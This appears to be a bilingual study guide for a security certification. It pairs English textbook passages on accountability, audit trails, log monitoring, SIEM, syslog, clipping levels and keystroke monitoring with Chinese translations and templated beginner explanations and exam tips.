security policy. Severe cases can result in terminating employment or legal prosecution. Legislation often requires specific monitoring and accountability practices. This includes laws such as the Sarbanes–Oxley Act of 2002, the Health Insurance Portability and Accountability Act (HIPAA), and the European Union (EU)'s General Data Protection Regulation (GDPR) that many organizations must abide by. Monitoring Activity Accountability is necessary at every level of business, from the frontline infantry to the high-level commanders overseeing daily operations.

If you don't monitor users’ actions and activities on a given system, you cannot hold them accountable for mistakes or misdeeds they commit. Consider Duane, a quality assurance supervisor for the data entry department at an oil-drilling data-mining company. He sees many highly sensitive documents that include the kind of valuable information that can earn a heavy tip or a bribe from interested parties during his daily routine. He also corrects the kind of mistakes that could cause serious backlash from his clientele. Sometimes, a minor clerical error can cause serious issues for a client's entire project.

Whenever Duane touches or transfers such information on his workstation, his actions leave an electronic trail of evidence that his supervisor, Nicole, can examine if Duane's actions should come under scrutiny. She can observe where he obtained or placed pieces of sensitive information, when he accessed and modified such information, and just about anything else related to the data's handling and processing as it flows in from the source and out to the client. This accountability protects the company should Duane misuse this information. It also provides Duane with protection against anyone falsely accusing him of misusing the data he handles. Monitoring and Investigations

中文直译 / 整理

安全策略追究其责任。 严重情况可能导致终止雇佣或法律起诉。 立法通常要求特定的监控和问责机制。 这包括《2002年萨班斯‑奥克斯利法 案》、《健康保险可携性和责任法案》(HIPAA)以及欧洲联盟(EU)的 《通用数据保护条例》(GDPR)等法规,许多组织必须遵守。 监控活动 问责必须贯穿业务的每一个层级,从一线员工到负责日常运营的高层管理 者。 如果你不监控用户在特定系统上的行为和活动,就无法对他们所犯的 错误或不当行为追究责任。 以杜安为例,他是某石油钻探数据挖掘公司数据录入部门的质量保证主管。 在日常工作中,他接触到许多高度敏感的文件,其中包含有价值的信息, 可能让相关方为获取这些信息而给予丰厚的回扣或贿赂。 他还需要纠正那 些可能引发客户强烈反弹的错误。 有时,一个微小的文书错误就可能导致 客户整个项目的严重问题。 每当杜安在他的工作站上接触或传输此类信息时,他的操作都会留下电子 痕迹,供他的主管妮可尔在审查杜安的行为时进行检查。 她可以观察他获 取或放置敏感信息的位置、访问和修改这些信息的时间,以及与数据从源 头流入到传输给客户过程中处理相关的几乎所有其他事项。

这种问责机制在杜安滥用此信息时保护公司,同时也为杜安提供保护, 防止任何人诬告他滥用所处理的数据。 监控与调查

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

问责性:问责性要求能把行为绑定到具体主体。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

问责依赖识别、认证、授权、审计和记账共同工作。

ISO 偏标准和管理体系。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
问责性 问责性要求能把行为绑定到具体主体。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
学习单元 53 / PDF P1190

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Audit trails give investigators the ability to reconstruct events long after they have occurred. They can record access abuses, privilege violations, attempted intrusions, and many different types of attacks. After detecting a security violation, security professionals can reconstruct the conditions and system state leading up to the event, during the event, and after the event through a close examination of the audit trail. One important consideration is ensuring that logs have accurate timestamps and that these timestamps remain consistent throughout the environment.

A common method is to set up an internal Network Time Protocol (NTP) server synchronized to a trusted time source such as a public NTP server. Other systems can then synchronize with this internal NTP server. NIST operates several time servers that support authentication. Once an NTP server is properly configured, the NIST servers will respond with encrypted and authenticated time messages. The authentication provides assurances that the response came from a NIST server. Systems should have their time synchronized against a centralized or trusted public time server. This ensures that all audit logs record accurate and consistent times for recorded events.

Monitoring and Problem Identification Audit trails offer details about recorded events that are useful for administrators. They can record system failures, OS bugs, and software errors in addition to malicious attacks. Some log files can even capture the contents of memory when an application or system crashes. This information can help pinpoint the cause of the event and eliminate it as a possible attack. For example, if a system keeps crashing due to faulty memory, crash dump files can help diagnose the problem. Using log files for this purpose is often labeled as problem identification.

Once a problem is identified, performing problem resolution involves little more than following up on the disclosed information. Monitoring and Tuning Techniques

中文直译 / 整理

审计跟踪使调查人员能够在事件发生很久之后重建事件过程。 它们可以记录访 问滥用、权限违规、尝试入侵以及多种不同类型的攻击。 在检测到安全违规后, 安全专业人员可以通过仔细审查审计跟踪,重建事件发生前、发生时和发生后 的条件与系统状态。 一个重要的考虑因素是确保日志具有准确的时间戳,并且这些时间戳在整个环 境中保持一致。 一种常见的方法是设置一个内部网络时间协议(NTP)服务器, 并将其与可信的时间源(如公共NTP服务器)同步。 其他系统然后可以与这个 内部NTP服务器同步。 NIST运行多个支持身份验证的时间服务器。 一旦NTP服务器正确配置, NIST服务器将返回加密并经过身份验证的时间消息。 这种身份验证确保了响应 来自NIST服务器。 系统应将其时间与集中式或可信的公共时间服务器同步。 这确保了所 有审计日志记录的事件时间准确且一致。 监控与问题识别 审计跟踪为管理员提供了有关已记录事件的详细信息。 它们不仅可以记录系统 故障、操作系统漏洞和软件错误,还可以记录恶意攻击。 某些日志文件甚至可 以在应用程序或系统崩溃时捕获内存内容。 这些信息有助于确定事件的原因, 并排除其作为可能攻击的可能性。

例如,如果系统因内存故障而频繁崩溃,崩 溃转储文件可以帮助诊断问题。 使用日志文件来实现此目的通常被称为问题识别。 一旦发现问题,解决问题 只需跟进所披露的信息即可。 监控与调优技术

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

审计:审计记录主体行为,用于追责、复盘和取证。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 54 / PDF P1191

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Monitoring is the process of reviewing information logs, looking for something specific. Personnel can manually review logs or use tools to automate the process. Monitoring is necessary to detect malicious actions by subjects as well as attempted intrusions and system failures. It can help reconstruct events, provide evidence for prosecution, and create reports for analysis. Tuning is the process of adjusting security controls to better match the needs of the organization and their operational environment. For example, intrusion detection and prevention systems require tuning to reduce the number of false positive alerts that they generate.

If a system is too sensitive, it will generate many alerts that will cause administrators to begin to mistrust, and possibly ignore, the system alerts. If a system is not sensitive enough, it may miss a potential intrusion. It's important to understand that monitoring and tuning are a continuous process. Continuous monitoring ensures that all events are recorded and can be investigated later if necessary. Many organizations increase logging in response to an incident or a suspected incident to gather additional intelligence on attackers. Continuous tuning ensures that the log entries and alerts are relevant and sufficient to meet the organization's security needs.

Log analysis is a detailed and systematic form of monitoring in which the logged information is analyzed for trends and patterns as well as abnormal, unauthorized, illegal, and policy-violating activities. Log analysis isn't necessarily in response to an incident but instead a periodic task, which can detect potential issues. When manually analyzing logs, administrators simply open the log files and look for relevant data. This process can be very tedious and time-consuming. For example, searching 10 different archived logs for a specific event or ID code can take some time, even when using built-in search tools.

In many cases, logs can produce so much information that important details can get lost in the sheer volume of data, so administrators often use automated tools to analyze the log data. For example, intrusion detection systems (IDSs) actively monitor multiple logs to detect and respond to malicious intrusions in real time. An IDS can help detect and track attacks from external attackers, send alerts to administrators, and record attackers’ access to resources. Multiple vendors sell operations management software that actively monitors systems’ security, health, and performance throughout a network. This

中文直译 / 整理

监控是审查信息日志并寻找特定内容的过程。 工作人员可以手动审查日志,或 使用工具自动化该过程。 监控对于检测主体的恶意行为、尝试入侵和系统故障 至关重要。 它有助于重建事件、提供起诉证据,并生成分析报告。 调优是调整安全控制措施以更好地匹配组织及其运营环境需求的过程。 例如, 入侵检测和预防系统需要进行调优,以减少其生成的误报数量。 如果系统过于 敏感,会产生大量警报,导致管理员开始不信任甚至可能忽略这些系统警报。 如果系统不够敏感,则可能错过潜在的入侵行为。 重要的是要理解,监控和调优是一个持续的过程。 持续监控确保所有事件都被 记录下来,以便在必要时进行调查。 许多组织在发生或疑似发生事件后会增加 日志记录,以获取有关攻击者的更多信息。 持续调优确保日志条目和警报相关 且足够,以满足组织的安全需求。 日志分析是一种详细且系统的监控形式,通过对日志信息进行分析,以发现 趋势、模式以及异常、未经授权、非法和违反策略的活动。 日志分析不一定 是对事件的响应,而是一种周期性任务,可以发现潜在问题。 在手动分析日志时,管理员只需打开日志文件并查找相关数据。 这一过程可能 非常繁琐且耗时。

例如,即使使用内置搜索工具,在10个不同的归档日志中查 找特定事件或ID代码也可能需要花费不少时间。 在许多情况下,日志会产生大量信息,导致重要细节被海量数据淹没,因此管 理员通常使用自动化工具来分析日志数据。 例如,入侵检测系统(IDS)会主 动监控多个日志,以实时检测和响应恶意入侵。 IDS有助于检测和追踪来自外 部攻击者的攻击,向管理员发送警报,并记录攻击者对资源的访问情况。 多个供应商销售运营管理系统软件,该软件可主动监控网络中系统的安全性、健康 状况和性能。 此

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

网络题先定位层次,再判断协议、设备或攻击位置。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 55 / PDF P1192

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

software automatically looks for suspicious or abnormal activities that indicate problems such as an attack or unauthorized access. Security Information and Event Management Many organizations use a centralized application to automate the monitoring of systems on a network. Several terms are used to describe these tools, including security information and event management (SIEM), security event management (SEM), and security information management (SIM). These tools provide centralized logging and real-time analysis of events occurring on systems throughout an organization. They include agents installed on remote systems that monitor for specific events known as alarm triggers.

When the trigger occurs, the agents report the event back to the central monitoring software. Many IDSs and IPSs send collected data to a SIEM system. The system also collects data from many other sources within the network, providing realtime monitoring of traffic and analysis and notification of potential attacks. Additionally, it provides long-term storage of data, allowing security professionals to analyze the data later. A SIEM typically includes several features. Because it collects data from dissimilar devices, it includes a correlation and aggregation feature converting this data into useful information.

Advanced analytic tools within the SIEM can analyze the data and raise alerts and/or trigger responses based on preconfigured rules. For example, a SIEM can monitor a group of email servers. Each time one of the email servers logs an event, a SIEM agent examines the event to determine whether it is an item of interest. If it is, the SIEM agent forwards the event to a central SIEM server. Depending on the event, it can raise an alarm for an administrator or take some other action. For example, if the send queue of an email server starts backing up, a SIEM application can detect the issue and alert administrators before the problem is serious.

Most SIEMs are configurable, allowing personnel within the organization to specify what items are of interest and need to be forwarded to the SIEM server. SIEMs have agents for just about any type of server or network device, and in some cases, they monitor network flows for traffic and trend analysis. The tools can also collect all the logs from target systems and use machine learning and artificial intelligence techniques to retrieve relevant data. Security professionals can then create reports and analyze the data.

中文直译 / 整理

软件会自动查找表明问题(如攻击或未经授权的访问)的可疑或异常活动。 安全信息和事件管理 许多组织使用集中式应用程序来自动化监控网络上的系统。 这些工具有多种称 呼,包括安全信息和事件管理(SIEM)、安全事件管理(SEM)和安全信息管 理(SIM)。 这些工具提供集中式日志记录和对组织内各系统上发生的事件的 实时分析。 它们包括安装在远程系统上的代理,用于监控称为警报触发器的特 定事件。 当触发事件发生时,代理会将事件报告回中央监控软件。 许多IDS和IPS将收集的数据发送到SIEM系统。 该系统还从网络内的许多其 他来源收集数据,提供对流量的实时监控、分析以及潜在攻击的通知。 此外, 它还提供数据的长期存储,使安全专业人员能够稍后分析这些数据。 SIEM通常包含多个功能。 由于它从不同类型的设备收集数据,因此包含关联和 聚合功能,将这些数据转换为有用的信息。 SIEM内的高级分析工具可以分析数 据,并根据预配置的规则发出警报和/或触发响应。 例如,SIEM 可以监控一组邮件服务器。 每当其中一台邮件服务器记录一个事 件时,SIEM 代理都会检查该事件以确定其是否为关注项。

如果是,SIEM 代 理会将该事件转发到中央 SIEM 服务器。 根据事件的不同,它可能向管理员 发出警报或执行其他操作。 例如,如果邮件服务器的发送队列开始积压, SIEM 应用程序可以检测到该问题,并在问题恶化前提醒管理员。 大多数SIEM系统都是可配置的,允许组织内的人员指定哪些项目是感兴趣的并 需要转发到SIEM服务器。 SIEM系统为几乎所有类型的服务器或网络设备提供 了代理,在某些情况下,它们还会监控网络流量以进行流量和趋势分析。 这些 工具还可以收集目标系统的所有日志,并使用机器学习和人工智能技术提取相 关数据。 安全专业人员随后可以生成报告并分析数据。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 56 / PDF P1193

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

SIEMs often include sophisticated correlation engines. These engines are a software component that collects the data and aggregates it looking for common attributes. It then uses advanced analytic tools to detect abnormalities and sends alerts to security administrators. Some monitoring tools are also used for inventory and status purposes. For example, tools can query all the available systems and document details, such as system names, IP addresses, operating systems, installed patches, updates, and installed software. These tools can then create reports of any system based on the needs of the organization.

For example, they can identify how many systems are active, identify systems with missing patches, and flag systems that have unauthorized software installed. Software monitoring watches for attempted or successful installations of unapproved software, use of unauthorized software, or unauthorized use of approved software. Software monitoring thus reduces the risk of users inadvertently installing a virus or Trojan horse. Syslog RFC 5424 describes the syslog protocol, which is used to send event notification messages. A centralized syslog server receives these syslog messages from devices on a network.

The protocol defines how to format the messages and how to send them to the syslog server but not how to handle them. Syslog has historically been used in Unix and Linux systems. These systems include the syslogd daemon, which handles all incoming syslog messages, similar to how a SIEM server provides centralized logging. Some syslogd extensions, such as syslog-ng and Rsyslog, allow the syslog server to accept messages from any source, not just Unix and Linux systems. Sampling Sampling, or data extraction, is the process of extracting specific elements from a large collection of data to construct a meaningful representation or summary of the whole.

In other words, sampling is a form of data reduction that allows someone to glean valuable information by looking at only a small sample of data in an audit trail. Statistical sampling uses precise mathematical functions to extract meaningful information from a large volume of data and is thus similar to the science used by pollsters to learn the opinions of large populations without SIEM

中文直译 / 整理

系统通常包含复杂的关联引擎。 这些引擎是一种软件组件,用于收集 数据并聚合数据以寻找共同属性,然后使用高级分析工具检测异常并向安全 管理员发送警报。 一些监控工具还用于盘点和状态管理。 例如,工具可以查询所有可用系统并记 录详细信息,如系统名称、IP地址、操作系统、已安装的补丁、更新和安装的 软件。 然后,这些工具可以根据组织的需求生成任何系统的报告。 例如,它们 可以识别有多少系统处于活动状态、识别缺少补丁的系统,以及标记安装了未 经授权软件的系统。 软件监控用于检测未经批准软件的尝试安装或成功安装、未经授权软件的使 用,或对已批准软件的未经授权使用。 因此,软件监控降低了用户无意中安 装病毒或木马的风险。 Syslog RFC 5424 描述了 syslog 协议,该协议用于发送事件通知消息。 集中式的 syslog 服务器从网络上的设备接收这些 syslog 消息。 该协议定义了如何格式 化消息以及如何将它们发送到 syslog 服务器,但未定义如何处理这些消息。 syslog 历史上一直用于 Unix 和 Linux 系统。

这些系统包含 syslogd 守护进 程,用于处理所有传入的 syslog 消息,类似于 SIEM 服务器提供的集中日志 功能。 一些 syslogd 扩展,如 syslog‑ng 和 Rsyslog,允许 syslog 服务器接 受来自任何源的消息,而不仅限于 Unix 和 Linux 系统。 抽样 抽样,或数据提取,是从大量数据中提取特定元素以构建整体有意义表示或摘 要的过程。 换句话说,抽样是一种数据缩减形式,允许通过查看审计跟踪中的 一小部分数据来获取有价值的信息。 统计抽样使用精确的数学函数从大量数据中提取有意义的信息,因此与民意调 查者在不

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 57 / PDF P1194

第 1194 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

interviewing everyone in the population. There is always a risk that sampled data is not an accurate representation of the whole body of data, and statistical sampling can identify the margin of error. Clipping Levels Clipping is a form of nonstatistical sampling. It selects only events that exceed a clipping level, which is a predefined threshold for the event. The system ignores events until they reach this threshold. For example, failed logon attempts are common in any system, since users can easily enter the wrong password once or twice.

Instead of raising an alarm for every single failed logon attempt, a clipping level can be set to raise an alarm only if it detects five failed logon attempts within a 30-minute period. Many account lockout controls use a similar clipping level. They don't lock the account after a single failed logon. Instead, they count the failed logons and lock the account only when the predefined threshold is reached. Clipping levels are widely used in the process of auditing events to establish a baseline of routine system or user activity. The monitoring system raises an alarm to signal abnormal events only if the baseline is exceeded.

In other words, the clipping level causes the system to ignore routine events and only raise an alert when it detects serious intrusion patterns. In general, nonstatistical sampling is discretionary sampling, or sampling at the auditor's discretion. It doesn't offer an accurate representation of the whole body of data and will ignore events that don't reach the clipping level threshold. However, it is effective when used to focus on specific events. Additionally, nonstatistical sampling is less expensive and easier to implement than statistical sampling. Both statistical and nonstatistical sampling are valid mechanisms to create summaries or overviews of large bodies of audit data.

However, statistical sampling is more reliable and mathematically defensible. Other Monitoring Tools Although logs are the primary tools used for monitoring, some additional tools are used within organizations that are worth mentioning. For example, a

中文直译 / 整理

采访整个人群的情况下了解大规模人群意见所使用的科学相似。 始终存在抽样 数据未能准确代表整体数据的风险,而统计抽样可以识别误差范围。 裁剪级别 裁剪是一种非统计抽样形式。 它仅选择超过裁剪级别的事件,该级别是事 件的预设阈值。 系统会忽略直到达到此阈值的事件。 例如,登录失败在任何系统中都很常见,因为用户可能轻易地输错一两次密码。 与其为每一次登录失败都发出警报,不如设置一个裁剪级别,仅在30分钟内检 测到五次登录失败时才触发警报。 许多账户锁定控制机制使用类似的裁剪级别: 它们不会在单次登录失败后锁定账户,而是统计失败次数,仅当达到预设阈值 时才锁定账户。 在审计事件以建立常规系统或用户活动基线的过程中,裁剪级别被广泛应用。 监控系统仅在超出基线时才发出警报以标记异常事件。 换句话说,裁剪级别使 系统忽略常规事件,仅在检测到严重入侵模式时才发出警报。 通常,非统计抽样是随意抽样,或由审计师自行决定的抽样。 它无法准确代 表整个数据集,并会忽略未达到截断水平阈值的事件。 然而,当用于聚焦特 定事件时,它非常有效。 此外,非统计抽样比统计抽样成本更低且更易于实 施。

统计抽样和非统计抽样都是创建大量审计数据摘要或概览的有效机 制。 然而,统计抽样更可靠且具有数学上的可辩护性。 其他监控工具 尽管日志是用于监控的主要工具,但组织中还有一些其他工具值得提及。 例如,一 个

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

审计:审计检查控制是否存在、是否有效、是否符合要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1194 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 58 / PDF P1195

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

CCTV system can automatically record events onto tape for later review. Security personnel can also watch a live CCTV system for unwanted, unauthorized, or illegal activities in real time. This system can work alone or in conjunction with security guards, who themselves can be monitored by the CCTV and held accountable for any illegal or unethical activity. Other tools include the following: Keystroke Monitoring Keystroke monitoring is the act of recording the keystrokes a user performs on a physical keyboard. The monitoring is commonly done via technical means such as a hardware device or a software program known as a keylogger. However, a video recorder can perform visual monitoring.

In most cases, attackers use keystroke monitoring for malicious purposes. In extreme circumstances and highly restricted environments, an organization might implement keystroke monitoring to monitor and analyze user activity. Keystroke monitoring is often compared to wiretapping. There is some debate about whether keystroke monitoring should be restricted and controlled in the same manner as telephone wiretaps. Many organizations that employ keystroke monitoring notify both authorized and unauthorized users of such monitoring through employment agreements, security policies, or warning banners at sign-on or login areas. Companies can and do use keystroke monitoring in some situations.

However, in almost all cases, they are required to inform employees of the monitoring. Traffic Analysis and Trend Analysis Traffic analysis and trend analysis are forms of monitoring that examine the flow of packets rather than actual packet contents. These processes are sometimes referred to as network flow monitoring. It can infer a lot of information, such as primary and backup communication routes, the location of primary servers, sources of encrypted traffic and the amount of traffic supported by the network, typical direction of traffic flow, frequency of communications, and much more.

These techniques can sometimes reveal questionable traffic patterns, such as when an employee's account sends a massive amount of email to others. This might indicate the employee's system is part of a botnet controlled by an attacker at a remote location. Similarly, traffic analysis might detect if an

中文直译 / 整理

闭路电视系统可以自动将事件记录在磁带上以供后续审查。 安保人员还可以实 时观看闭路电视系统,以发现任何不受欢迎、未经授权或非法的活动。 该系统 可以单独运行,也可以与安保人员配合使用,而安保人员本身也可通过闭路电 视进行监控,并对其任何非法或不道德的行为负责。 其他工具包括以下几种: 键盘记录 键盘记录 是指记录用户在物理键盘上输入的按键操作。 这种监控通常 通过技术手段实现,例如硬件设备或称为键盘记录器的软件程序。 然而,视频录 制设备也可以进行视觉监控。 在大多数情况下,攻击者使用键盘记录用于恶意目 的。 在极端情况和高度受限的环境中,组织可能会实施键盘记录以监控和分析用 户活动。 键盘记录常与电话窃听相比较。 关于键盘记录是否应像电话窃听一样受到限制 和管控,目前仍存在一些争议。 许多使用键盘记录的组织通过雇佣协议、安全 政策或登录区域的警告横幅,通知授权和非授权用户此类监控的存在。 公司在某些情况下可以并确实使用键盘记录。 然而,在几乎所有情 况下,它们都有义务告知员工正在实施监控。 流量分析与趋势分析 流量分析 和 趋势分析 是一类监控形式,它们检查数据包的 流动而非实际的数据包内容。

